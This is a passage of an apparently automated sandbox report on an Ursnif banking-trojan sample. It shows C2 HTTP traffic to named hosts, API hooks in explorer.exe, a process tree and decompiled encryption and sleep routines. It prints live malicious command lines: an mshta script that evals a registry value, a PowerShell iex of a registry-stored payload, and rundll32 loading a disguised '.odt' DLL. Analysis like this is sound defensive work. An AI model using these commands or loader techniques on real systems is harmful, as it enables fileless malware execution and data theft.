Aug 2, 2021 22:06:43.634000063 CEST	12389	IN	Data Raw: 5b dd 1b 5a da 06 52 7c 79 7e ad 7d f7 63 0d b1 31 1e 0a f3 fc 2d 15 38 6f 32 57 13 19 0f 2d 05 77 b6 d6 bd c2 15 92 33 fe b2 7b a8 b0 e4 cc 39 87 26 68 0f 54 85 2c d2 4f b3 0a fc 86 da c1 74 b5 06 a2 53 d8 07 3c b0 df ce 1e 44 12 d8 33 c6 56 11 Data Ascii: [ZR\|y~}c1-8o2W-w3{9&hT,OtS<D3V9sOos!.ng*`m:]omHg{mo~q ygF5r7:447p<xF#tWR_H(I0FxCC\| yKh

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49746	185.228.233.17	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 22:06:44.399979115 CEST	12633	OUT	GET /kOsDeCoa3YCbt/7unBBLww/wK2a4bs_2FEI4QMN91PzB77/bz4N4g_2FJ/HycIy3_2F8zj3jBC0/8_2FW3BGV1mS/XPDK9f9Rzez/BpS5UyR9Bg2zMd/a_2FnA03_2FZhf2fI92gT/6Pq3nEyBr7Wl1SSB/zAmSQjqWqXfIY_2/Byf0kTcmXemOm2EfN6/CRY7WM32g/emO80EseOb_2BSjCXMeG/FctE3VztzFEWZR0a5bZ/yCEZcBPGdi592UoFqj3gHf/9Ntn0rghQ_2Bu/Ix9av6MS/M_2FOYWbdmDkx6Xj7Ngd9FO/n_2Fp4ojwk/l2YrsEsA6NU73tN6Q/Nzovizi1/wIzBsN1hETht/VNa HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 Host: gtr.antoinfer.com
Aug 2, 2021 22:06:44.934506893 CEST	12635	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 02 Aug 2021 20:06:44 GMT Content-Type: application/octet-stream Content-Length: 1955 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="61085054d91e7.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: f5 8f f6 38 cf 75 c2 a1 af 6c 53 15 9f 46 22 3c 49 78 46 3a 7f 56 ef 3b 00 0e 0a 06 1a 89 ec 92 46 5a a5 b0 50 78 f4 1a 53 10 1f 04 70 45 b6 72 16 57 e3 c6 fd d1 66 98 99 a3 95 5b 31 fc 1f 93 fb 36 e9 6c ca 60 00 2e a7 94 d3 9e 8d 74 a8 be 6d 4f 00 73 6b 8f 2c 91 24 20 dd f0 40 82 3a 9f 73 86 75 43 62 02 dd 62 5d 56 02 05 ee bd e6 39 91 8e 61 61 1e 3a 93 a3 96 0a b3 de 63 b7 43 ad 0e c2 5a 40 48 c4 2f bd 39 28 19 4b 6f b3 2f cb e7 59 fb 84 9f 50 02 4a 10 d1 42 eb 25 a3 5f a7 ab f5 aa 08 cc 61 f4 e9 93 ba ab 19 bb fc 48 c4 1c e5 03 a1 c6 9c be f4 67 c7 c4 4f e0 6a 41 a0 0c a5 ea 40 bd 60 a7 83 7b 6f 06 ba 87 d6 39 e1 7a f0 5a 1b 46 4a 2f 2d 1d da 4a 97 02 b1 f9 45 98 33 8d 15 20 2f ae a0 79 f9 b6 d6 42 12 52 b3 65 2f 52 46 b0 97 c4 26 49 e9 df 60 e0 05 1e bb 1b 46 be e1 92 d0 b0 80 62 5e 71 af 48 a6 60 85 a3 63 88 0d a0 c6 12 3d 26 1e a4 a4 e4 77 7b 98 83 b4 02 b1 85 31 46 4f 9b e2 84 16 8b ad 00 d1 d0 de e7 e7 83 f6 f0 11 d7 83 9d 68 25 af fe 33 81 c4 fa 60 ef 89 7f 00 a0 f7 c9 68 3a 73 ba 9e d8 a9 54 2d e8 0e 8b a8 c7 d2 14 4e 73 f7 ce d7 5a 74 3b 37 2f d0 29 4c 87 e0 72 b6 2e 0e a2 f0 29 fb 9c 94 01 5d a0 a0 18 d1 a1 e5 22 3b eb bc 0c 44 c5 58 7b fb 29 f4 f5 64 22 f3 5d 79 c4 12 91 47 b2 fb 65 97 64 ca ec fa 30 93 25 76 ba 04 f2 9a 3c 4d 70 36 b5 fc 69 1f d4 59 cf 21 38 cb 0f b9 d0 44 02 8a 97 42 22 4d 8f 52 3b 59 99 16 fa ac 93 82 c8 b1 1c a4 48 7a 4e 49 8f 8f c5 1a 8f c6 50 6e d8 cc 13 d4 48 31 c3 23 74 30 a0 c6 5e 2b 9c 37 19 02 1a cb 12 e5 5c fe b2 b0 4b 8e 40 5b d9 f8 2c 41 38 90 0a fb 1b a4 47 bf 98 89 b3 37 14 ca 3e 99 9d b8 d7 47 88 b5 42 ac f9 5d 52 bd 52 fc a9 0b 89 3c 65 c5 92 c0 e3 c7 87 05 6a 94 e4 04 67 30 db 32 2d c0 67 ab 8f d0 b2 64 e4 80 90 1b f2 10 10 9d b0 da 07 99 da e2 a8 c7 d8 45 20 50 82 87 02 04 af 95 5c 7e 30 32 21 ba c5 09 ed 8a ab 3c 82 ac 23 e0 84 10 95 31 81 89 39 a8 f7 4a 21 87 ce 70 54 99 19 6c d6 06 88 8c db 10 b0 06 f8 ed 55 38 6a 32 dd 2e 25 22 8a 4b 5e 05 4d 1d 85 ad c1 fa 6a 9c 59 a4 af 33 c6 31 51 a5 e4 0a 57 e5 3b 06 8c 81 f9 dd 9a 3a 2d 0a 92 76 44 49 86 c1 07 2b a3 8f 9b 14 1c eb 46 56 cc 1a b0 c1 cb f2 e3 c1 21 56 08 04 9e 9b 49 7f 88 ce 6e f9 a9 c6 11 11 77 94 f5 de a3 4a 52 03 e3 6c 67 2f 45 cc 54 33 cd 85 a3 8f 33 4f 0d 79 f8 4c 04 79 aa 0c d3 c8 93 7a 24 9f 20 7d 02 4e fa a5 36 88 b0 9a e8 20 9b 62 f3 31 17 32 46 21 12 b8 33 1f 27 ce 93 16 95 fb 01 99 67 ac 53 06 2e 23 6c 42 83 1c 2a 75 b2 89 86 99 a0 17 5d ac 8e 31 36 3b e8 1d 84 22 ea 4f 8e 2a 21 2b d7 3a 5d 2c eb 26 50 d3 e5 ec 3c 58 f2 49 aa e0 4b 9f b1 ed 72 95 fd 0d 15 ad b4 9e 0a 60 06 f9 f5 9e a9 98 2d 0b 77 68 29 e6 b2 2a 0a ca de a4 62 55 e9 f1 34 c2 8e c2 b7 15 21 ba 0d c5 6b b1 2e 90 29 f2 5e d1 64 32 0e 35 97 9f ed 68 cd e9 ae 09 ea db 3d fc 91 09 e3 43 e5 ab c3 f0 2d c3 9e e5 d7 e6 5d 57 a7 1f 37 6a b5 Data Ascii: 8ulSF"<IxF:V;FZPxSpErWf[16l`.tmOsk,$ @:suCbb]V9aa:cCZ@H/9(Ko/YPJB%_aHgOjA@`{o9zZFJ/-JE3 /yBRe/RF&I`Fb^qH`c=&w{1FOh%3`h:sT-NsZt;7/)Lr.)]";DX{)d"]yGed0%v<Mp6iY!8DB"MR;YHzNIPnH1#t0^+7\K@[,A8G7>GB]RR<ejg02-gdE P\~02!<#19J!pTlU8j2.%"K^MjY31QW;:-vDI+FV!VInwJRlg/ET33OyLyz$ }N6 b12F!3'gS.#lBu]16;"O!+:],&P<XIKr`-wh)*bU4!k.)^d25h=C-]W7j
Aug 2, 2021 22:06:44.935604095 CEST	12636	IN	Data Raw: 9c 10 a4 97 32 18 9b 6e 4e 4a 7e 94 08 2b 11 4a f1 3e ea f7 4d 41 b2 2b e1 35 2f 1a 7d 29 97 1a d3 c0 1a 92 0b e4 1b 1e e2 55 a6 ae 79 f9 80 b2 6a 42 ae d7 89 8e e1 d3 ac bd 28 70 4e b4 d4 5b 8d c4 1d 48 f8 61 76 8c f0 6f 82 08 4e 87 0e bb 9b e9 Data Ascii: 2nNJ~+J>MA+5/})UyjB(pN[HavoN)jzj6{'$83~W~S[*ta.z[QdY8X~adifE#xy8# ^9%UZ\|Zt!.yD-jd6rR=HxGbzf?5nit_[

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49747	185.228.233.17	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 22:07:15.658662081 CEST	12638	OUT	GET /G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Host: app.flashgameo.at
Aug 2, 2021 22:07:16.188829899 CEST	12638	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 02 Aug 2021 20:07:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49748	185.228.233.17	80	C:\Windows\SysWOW64\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 22:07:16.567487955 CEST	12639	OUT	POST /x7RHILsUu13RNWdAgcyIG/qtXPZ5mShxWyId8A/aqzFvUR1vpmX8Up/q_2B2EdTfKMNCz0qxF/_2FPDHq0L/LUAKCoi5Kv4k92FCS9c4/5pNcQF7C6KYMZBsUSDt/KFidT5iQrYQJ8LRP_2FoLY/f_2B88YT7woyk/KKJVXmPv/vF_2FE_2Fvc1X20QJ8r0Wn_/2BzNsjc_2F/YMdyw7a8HJLKOf2JR/adM5VRnv5AOV/eVROMbVITYu/4QdgxMF4kpaBK6/UL3JxZ6B_2FLQEdWMX_2B/oDqnX_2BCDatYw9I/KVGr3LtJ92s34dn/eT_2Bba67PTBBLkoO/1xww0J HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 Content-Length: 2 Host: app.flashgameo.at

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe

Processes

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFB70FF521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFB70FF5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFB70FF520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFB70FF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	612B8A8

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFB70FF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	612B8A8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 748 Parent PID: 3388

General

Start time:	22:02:55
Start date:	02/08/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs'
Imagebase:	0x7ff62b2c0000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WmiPrvSE.exe PID: 5924 Parent PID: 792

General

Start time:	22:05:37
Start date:	02/08/2021
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff66d5c0000
File size:	488448 bytes
MD5 hash:	A782A4ED336750D10B3CAF776AFE8E70
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 5940 Parent PID: 5924

General

Start time:	22:05:37
Start date:	02/08/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Imagebase:	0x7ff79da10000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4576 Parent PID: 5940

General

Start time:	22:05:38
Start date:	02/08/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Imagebase:	0xcc0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WmiPrvSE.exe PID: 484 Parent PID: 792

General

Start time:	22:06:40
Start date:	02/08/2021
Path:	C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0xeb0000
File size:	426496 bytes
MD5 hash:	7AB59579BA91115872D6E51C54B9133B
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: WmiPrvSE.exe PID: 2844 Parent PID: 792

General

Start time:	22:06:48
Start date:	02/08/2021
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff66d5c0000
File size:	488448 bytes
MD5 hash:	A782A4ED336750D10B3CAF776AFE8E70
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: mshta.exe PID: 5200 Parent PID: 3388

General

Start time:	22:06:49
Start date:	02/08/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Imagebase:	0x7ff7f5bf0000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 4260 Parent PID: 5200

General

Start time:	22:06:51
Start date:	02/08/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Imagebase:	0x7ff785e30000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6084 Parent PID: 4260

General

Start time:	22:06:52
Start date:	02/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 4948 Parent PID: 4260

General

Start time:	22:07:01
Start date:	02/08/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
Imagebase:	0x7ff674840000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 4576 Parent PID: 5940 rundll32.exeCOMMON

Executed Functions

Function 04444CEA, Relevance: 19.7, APIs: 13, Instructions: 163
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E04444CEA(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x444a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x444a0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E04441EF5(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x444a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E044430D1(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x04444cf3
0x04444cf9
0x04444cfc
0x04444d02
0x04444d02
0x04444d04
0x04444d06
0x04444d09
0x04444d0f
0x04444d10
0x04444d11
0x04444d17
0x04444d1c
0x04444d22
0x04444d2a
0x04444e87
0x04444d30
0x04444d32
0x04444d3b
0x04444d40
0x04444d52
0x04444d55
0x04444d59
0x04444d60
0x04444d64
0x04444d6c
0x04444e72
0x04444d72
0x04444d72
0x04444d76
0x04444d77
0x04444d79
0x04444d84
0x04444e5e
0x04444d8a
0x04444d8a
0x04444d8d
0x04444d93
0x04444d99
0x04444d99
0x04444da1
0x04444da5
0x04444da8
0x04444e4f
0x04444dae
0x04444db4
0x04444db7
0x04444dba
0x04444dbc
0x04444dbf
0x04444dc2
0x04444dc4
0x04444dc4
0x04444dce
0x04444dd3
0x04444dd6
0x04444dd9
0x04444ddb
0x04444de4
0x04444e0e
0x04444de6
0x04444df7
0x04444df7
0x04444e16
0x00000000
0x00000000
0x04444e18
0x04444e1b
0x04444e1e
0x04444e22
0x00000000
0x04444e24
0x04444e33
0x04444e39
0x04444e41
0x04444e41
0x00000000
0x04444e22
0x04444e26
0x04444e2e
0x04444e31
0x04444e48
0x00000000
0x00000000
0x00000000
0x04444e31
0x04444da8
0x04444e61
0x04444e64
0x04444e64
0x04444e79
0x04444e79
0x04444e91

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,044423CD,00000001,044470F6,00000000), ref: 04444D22
memcpy.NTDLL(044423CD,044470F6,00000010,?,?,?,044423CD,00000001,044470F6,00000000,?,04443A4A,00000000,044470F6,?,00000000), ref: 04444D3B
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04444D64
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04444D7C
memcpy.NTDLL(00000000,00000000,05349630,00000010), ref: 04444DCE
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05349630,00000020,?,?,00000010), ref: 04444DF7
CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05349630,?,?,00000010), ref: 04444E0E
GetLastError.KERNEL32(?,?,00000010), ref: 04444E26
GetLastError.KERNEL32 ref: 04444E58
CryptDestroyKey.ADVAPI32(00000000), ref: 04444E64
GetLastError.KERNEL32 ref: 04444E6C
CryptReleaseContext.ADVAPI32(?,00000000), ref: 04444E79
GetLastError.KERNEL32(?,?,?,044423CD,00000001,044470F6,00000000,?,04443A4A,00000000,044470F6,?,00000000,044470F6,00000000,05349630), ref: 04444E81

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
String ID:
API String ID: 1967744295-0
Opcode ID: b9f6a9eef04e1712458ed97e5a7e6d1e229b1e98289270a44234f6ab0a345485
Instruction ID: 7edb63c42dc7bcae965567d8f9c4629bef8699a02ece3f5893d90e4efd388da1
Opcode Fuzzy Hash: b9f6a9eef04e1712458ed97e5a7e6d1e229b1e98289270a44234f6ab0a345485
Instruction Fuzzy Hash: 62515FB1900208FFFF21DFA5D984AAEBBB9EB84750F10442AF915E6240D735AE149B21

Uniqueness

Uniqueness Score: -1.00%

Function 702E1E74, Relevance: 13.6, APIs: 9, Instructions: 107
sleepnativesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E702E1E74(intOrPtr _a4) {
				void _v316;
				signed int _v332;
				long _v344;
				long _v348;
				char _v356;
				char _v360;
				long _v364;
				long _v368;
				void* __edi;
				long _t25;
				long _t28;
				long _t31;
				long _t32;
				long _t36;
				void* _t42;
				intOrPtr _t44;
				intOrPtr _t49;
				long _t50;
				void* _t56;
				signed int _t59;
				signed int _t60;
				void* _t62;
				intOrPtr* _t63;

				_t25 = E702E1262();
				_v348 = _t25;
				if(_t25 != 0) {
					L18:
					return _t25;
				} else {
					goto L1;
				}
				do {
					L1:
					_v344 = 0;
					_t28 = NtQuerySystemInformation(8,  &_v316, 0x138,  &_v344); // executed
					_t50 = _t28;
					_t59 = 0x13;
					_t11 = _t50 + 1; // 0x1
					_t60 = _v332 % _t59 + _t11;
					_t31 = E702E1C3E(0, _t60); // executed
					_v368 = _t31;
					Sleep(_t60 << 4); // executed
					_t25 = _v368;
				} while (_t25 == 9);
				if(_t25 != 0) {
					goto L18;
				}
				_t32 = E702E1A55(_t50); // executed
				_v364 = _t32;
				if(_t32 != 0) {
					L16:
					_t25 = _v364;
					if(_t25 == 0xffffffff) {
						_t25 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t62 = E702E17B5(E702E15DD,  &_v356);
					if(_t62 == 0) {
						_v368 = GetLastError();
					} else {
						_t36 = WaitForSingleObject(_t62, 0xffffffff);
						_v368 = _t36;
						if(_t36 == 0) {
							GetExitCodeThread(_t62,  &_v368);
						}
						CloseHandle(_t62);
					}
					goto L16;
				}
				if(E702E1733(_t50,  &_v360) != 0) {
					 *0x702e41b8 = 0;
					goto L11;
				}
				_t49 = _v360;
				_t63 = __imp__GetLongPathNameW;
				_t42 =  *_t63(_t49, 0, 0); // executed
				_t56 = _t42;
				if(_t56 == 0) {
					L9:
					 *0x702e41b8 = _t49;
					goto L11;
				}
				_t19 = _t56 + 2; // 0x2
				_t44 = E702E196E(_t56 + _t19);
				 *0x702e41b8 = _t44;
				if(_t44 == 0) {
					goto L9;
				} else {
					 *_t63(_t49, _t44, _t56); // executed
					E702E2117(_t49);
					goto L11;
				}
			}

0x702e1e83
0x702e1e8c
0x702e1e90
0x702e1fa4
0x702e1faa
0x00000000
0x00000000
0x00000000
0x702e1e96
0x702e1e96
0x702e1ea7
0x702e1eab
0x702e1eb1
0x702e1eb9
0x702e1ebe
0x702e1ebe
0x702e1ec3
0x702e1ecc
0x702e1ed0
0x702e1ed6
0x702e1eda
0x702e1ee1
0x00000000
0x00000000
0x702e1ee7
0x702e1eee
0x702e1ef2
0x702e1f95
0x702e1f95
0x702e1f9c
0x702e1f9e
0x702e1f9e
0x00000000
0x702e1f9c
0x702e1efb
0x702e1f4e
0x702e1f4e
0x702e1f5f
0x702e1f63
0x702e1f91
0x702e1f65
0x702e1f68
0x702e1f70
0x702e1f74
0x702e1f7c
0x702e1f7c
0x702e1f83
0x702e1f83
0x00000000
0x702e1f63
0x702e1f09
0x702e1f48
0x00000000
